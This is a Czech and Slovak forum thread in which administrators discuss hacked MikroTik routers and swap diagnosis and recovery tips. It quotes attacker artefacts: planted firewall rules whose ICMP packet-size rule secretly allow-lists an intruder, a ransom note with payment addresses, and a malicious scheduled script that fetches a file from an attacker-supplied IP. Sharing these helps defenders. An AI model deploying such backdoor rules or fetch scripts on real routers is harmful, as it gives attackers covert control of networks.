MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

hapi

skuz ho dát do složky flash

mpcz

A proč nejde Netinstall? mpcz, 2.jul.2018

vojcekp

Tak měl jsem tu v pátek taky jednoho zavirovaného. Z ničeho nic u klienta přestal jít internet. Vzdáleně jsem se nedostal tak jsem tam jel. Vysledek: identity HACKED, změněné všechny hesla pro přístup a změněné DNS. Vzhledem tomu že jsem se do něj nedostal tak jsem udělal netinstall a nastavil vše znovu. Nicméně měl jsem tam verzi 6.40.6 zvenku všechno drop krom mé ip adresy, v ip services vše povypínané až na winbox a samozřejmě silné hesla.... tož by mě teda zajímalo jak se to tam mohlo dostat když je zvenku vše drop. Ode mě určitě ne mám vše čisté. Z vnitřní sítě těžko je tam 1 tiskárna a 2 pc které jsou tak zabezpečené že sebelepší vir nemá šanci. Pokud to totiž úplně obejde firewall tak je to pak průser jako prase...

ludvik

Mám takový pocit, že spousta lidí zapomíná na MAC-winbox ...

mpcz

Ale to by musel virus první napadnout nějaký jiný stroj ve vnitřní síti, ne? A proč tam měl 6.40.6 a teď se diví? mpcz, 2.jul.2018

shooter

co SNMP?

mpcz

BUSYBOX - nikdo nereagoval, tak bych rád zopakoval dotaz:

1/ V mikrotiku originál je BUSYBOX, popř. které verze?

2/ Pokud by se podařil zřídit do MKT plný přístup, jak lze upgradovat BB na novou verzi, která má fdisk?

3/ Pokud nejde v MKT upgradovat BB, jak dostat a spustit do MKT/BB fdisk?

Děkuji, mpcz 3.jul.2018

dalibortoman

BUSYBOX - nikdo nereagoval, tak bych rád zopakoval dotaz:

1/ V mikrotiku originál je BUSYBOX, popř. které verze?

v tom baliku co otevira devel-mode pristup (https://github.com/0ki/mikrotik-tools.git) je i novy busubox, ktery dost rozsiruje seznam podporovanych utilit. Nahraval jsem si ho rucne:

- nahrat busybox (MIBSBE - busybox-mips) pomoci scp pod jmenem busybox_p

- nahrat scpckem slave.sh

- v telnetu pod devel uctem spustit: chmod a+x slave.sh

./slave.sh

tim se novy busybox nalinkuje na nove povely

- rebootnout

fdisk tam tusim je (pripadne existuji dalsi podobne utility, ktere by v nem mohly byt - sfdisk (opatrne s nim), parted atd).

Ale bylo mni to stejne k prdu, protoze netusim, ktery disk je ktery - nenasel jsem zadny ze ktereho bych vypsal ty partitiony. Ale moc casu jsem tomu nevenoval. Zajimalo me v tu chvili neco jineho

mpcz

Dík, jasné, zkusím. mpcz, 3.jul.2018

hapi

tak máme další.

originální ip adresy

/ip address

add address=192.168.15.29/24 interface=wlan1 network=192.168.15.0

add address=192.168.2.30/24 interface=ether1 network=192.168.2.0

vytvořilo si to address list

/ip firewall address-list

add address=192.168.2.0/24 list=allow-ip

add address=192.168.15.0/24 list=allow-ip

a pak tohle dropnutí mimo lokálních subnetů

/ip firewall filter

add action=tarpit chain=input comment="Add you ip addess to allow-ip in Address Lists." dst-port=30553 protocol=tcp

add action=add-src-to-address-list address-list=allow-ip address-list-timeout=1h chain=input comment="The security flaw for Hajime is closed by the firewall." packet-size=1083 protocol=icmp

add chain=input comment="Please update RotherOS and change password." src-address-list=allow-ip

add action=drop chain=input comment=" Thanks are accepted on WebMoney Z399578297824" dst-port=53 protocol=udp

add action=drop chain=input comment="or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1" dst-port=53,8728,8729,21,22,23,80,443,8291 protocol=tcp

add action=passthrough chain=input

plus note

/system note set note="The security flaw for Hajime is closed by the firewall. Please update RotherOS. Gratitude is accepted on WebMoney Z399578297824 or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1"

mpcz

to Dalibor Toman: Ok, něco je asi špatně, BB mám stále v. 1.0. Fdisk tam nevidím. Dalo by se prosím ověřit, jestli tam opravdu je? A jaká verze/datum BB tam má svítit? Dík, mpcz, 3.jul.2018

mpcz

to Hapi: A v jakém stavu bylo zabezpečení / verze ROS? Dík, mpcz, 3.jul.2018

dalibortoman

to Dalibor Toman: Ok, něco je asi špatně, BB mám stále v. 1.0. Fdisk tam nevidím. Dalo by se prosím ověřit, jestli tam opravdu je? A jaká verze/datum BB tam má svítit? Dík, mpcz, 3.jul.2018

# fdisk

BusyBox v1.21.1 (2013-07-08 10:56:01 CDT) multi-call binary.

Usage: fdisk [-ul] [-C CYLINDERS] [-H HEADS] [-S SECTORS] [-b SSZ] DISK

Change partition table

-u Start and End are in sectors (instead of cylinders)

-l Show partition table for each DISK, then exit

-b 2048 (for certain MO disks) use 2048-byte sectors

-C CYLINDERS Set number of cylinders/heads/sectors

-H HEADS -S SECTORS

kdys spustim samotny busybox tak hlasi verzi 1.00

zkousel jsem hledat partition tabulky na /dev/mtdXXX ale nikde zadna neni. Tak nevim jak to je s tou flashkou udelane...

dalibortoman

to Dalibor Toman: Ok, něco je asi špatně, BB mám stále v. 1.0. Fdisk tam nevidím. Dalo by se prosím ověřit, jestli tam opravdu je? A jaká verze/datum BB tam má svítit? Dík, mpcz, 3.jul.2018

cast povelu je mampovana na original busybox a cast na novy busybox_p.

po spusteni busybox_p vidis seznam implementovanycvh povelu. POkud to hle funguje a spusteni fdisku ne tak se napovedlo naaliasovani tech povelu

# fdisk

BusyBox v1.21.1 (2013-07-08 10:56:01 CDT) multi-call binary.

Usage: fdisk [-ul] [-C CYLINDERS] [-H HEADS] [-S SECTORS] [-b SSZ] DISK

Change partition table

-u Start and End are in sectors (instead of cylinders)

-l Show partition table for each DISK, then exit

-b 2048 (for certain MO disks) use 2048-byte sectors

-C CYLINDERS Set number of cylinders/heads/sectors

-H HEADS -S SECTORS

kdys spustim samotny busybox tak hlasi verzi 1.00

zkousel jsem hledat partition tabulky na /dev/mtdXXX ale nikde zadna neni. Tak nevim jak to je s tou flashkou udelane...

mpcz

A v seznamu příkazů v helpu je? mpcz, 3.jul.2018

dalibortoman

to Dalibor Toman: Ok, něco je asi špatně, BB mám stále v. 1.0. Fdisk tam nevidím. Dalo by se prosím ověřit, jestli tam opravdu je? A jaká verze/datum BB tam má svítit? Dík, mpcz, 3.jul.2018

cast povelu je mampovana na original busybox a cast na novy busybox_p.

po spusteni busybox_p vidis seznam implementovanycvh povelu. Pokud tohle funguje a spusteni fdisku ne tak se napovedlo naaliasovani tech povelu

# fdisk

BusyBox v1.21.1 (2013-07-08 10:56:01 CDT) multi-call binary.

Usage: fdisk [-ul] [-C CYLINDERS] [-H HEADS] [-S SECTORS] [-b SSZ] DISK

Change partition table

-u Start and End are in sectors (instead of cylinders)

-l Show partition table for each DISK, then exit

-b 2048 (for certain MO disks) use 2048-byte sectors

-C CYLINDERS Set number of cylinders/heads/sectors

-H HEADS -S SECTORS

kdys spustim samotny busybox tak hlasi verzi 1.00

zkousel jsem hledat partition tabulky na /dev/mtdXXX ale nikde zadna neni. Tak nevim jak to je s tou flashkou udelane...

dalibortoman

A v seznamu příkazů v helpu je? mpcz, 3.jul.2018

je, pokud nejde spustit samotny fdisk zkus:

busybox_p fdisk

koukam, ze se mi ty prispevky nejak podarilo domotat (misto editace jsem pridal dalsi ve kterem jsem to snad vysvetlil).

hapi

to Hapi: A v jakém stavu bylo zabezpečení / verze ROS? Dík, mpcz, 3.jul.2018

ve špatnym. 6.37.3 nebo co a vše otevřený. Aktuálně vše otevřený s 6.42.5 tak se uvidí.

mpcz

to Dalibor Toman: asi ano, protože už mi to docvaklo. To je teda děs, BB píše v 1.00 ale jinde něco jiného. Ten fdisk tam opravdu je a funguje. Dík, mpcz 3.jul.2018

tulo

Takze na sieti jeden zabudnuty stary mikrotik s presmerovanou verejnou IP... Prihlásený par dni dozadu niekto cudzí. Čiže heslo odhalené, updatol som to na najnovšiu verziu. V skriptoch bol urobený skript čo vyrobil súbor autosupout1.rif a následne ho scheduler posielal niekam:

(="") do={

ssip

/tool fetch url="http://$ssip/autosupout1.rif" dst-path=autosupout1.rif

}

execute

« Předchozí stránka Další stránka »